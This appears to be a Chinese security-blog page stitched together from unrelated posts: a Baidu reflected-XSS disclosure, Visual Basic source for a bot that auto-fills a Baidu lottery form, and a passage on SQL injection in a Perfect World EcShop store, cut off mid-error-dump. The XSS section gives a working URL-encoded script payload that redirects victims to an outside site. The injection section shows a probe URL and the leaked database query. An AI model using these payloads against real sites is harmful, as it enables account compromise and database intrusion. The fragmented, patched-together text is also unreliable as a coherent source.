手贱乱点 - 居然点到了百度 XSS 漏洞一枚

百度 XSS 跨站漏洞一个,漏洞演示: http://apps.hi.baidu.com/dashan/data/status?asyn=1&callback=CustomEvent.checkDashStatus&current=d54b41625f7a65726ffe0a&portrait[]==%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%31%2D%30%32%2D%30%33%20%32%31%3A%31%39%3A%31%38%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E 漏洞发现者:末日,没啥技术含量的鸡肋漏洞,不解释了。。。 利用代码: http://apps.hi.baidu.com/dashan/data/status?asyn=1&callback=CustomEvent.checkDashStatus&current=d54b41625f7a65726ffe0a&portrait[]==%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%4E%75%63%6C%65%61%72%27%41%74%6B%20%32%30%31%31%2D%30%32%2D%30%33%20%32%31%3A%31%39%3A%31%38%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%22%3C%2F%73%63%72%69%70%74%3E 红色部分为 URL 编码过的 JavaScript 代码,未编码的如下

百度红包抽奖辅助程序 VB 源码 自动填写

以下是部分源码片段: Dim HongBao  As String Private Sub Command1_Click()     WebBrowser1.Navigate HongBao End Sub Private Sub Command2_Click()     WebBrowser1.Document.getElementById("name").Value = Text1.Text              '填写名字     WebBrowser1.Document.getElementById("select-year").Value = Text2.Text       '填写年份     WebBrowser1.Document.getElementById("select-month").Value = Text3.Text      '填写月份     WebBrowser1.Document.getElementById("select-day").Value = Text4.Text        '填写日期     WebBrowser1.Document.All("check-1").Checked = True                          '点击同意

完美时空周边商城注射 - EcShop 支付漏洞

    http://shop.wanmei.com/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and%20fuck 出错信息: <b>MySQL server error report:Array (     [0] => Array         (             [message] => MySQL Query Error         )     [1] => Array         (             [sql] => SELECT log_id FROM `shop`.`ecs_pay_log` WHERE order_id=1and fuck AND order_type=1         )     [2] => Array         (             [error] => Unknown column 'fuck' in 'where clause'         )     [3] => Array         (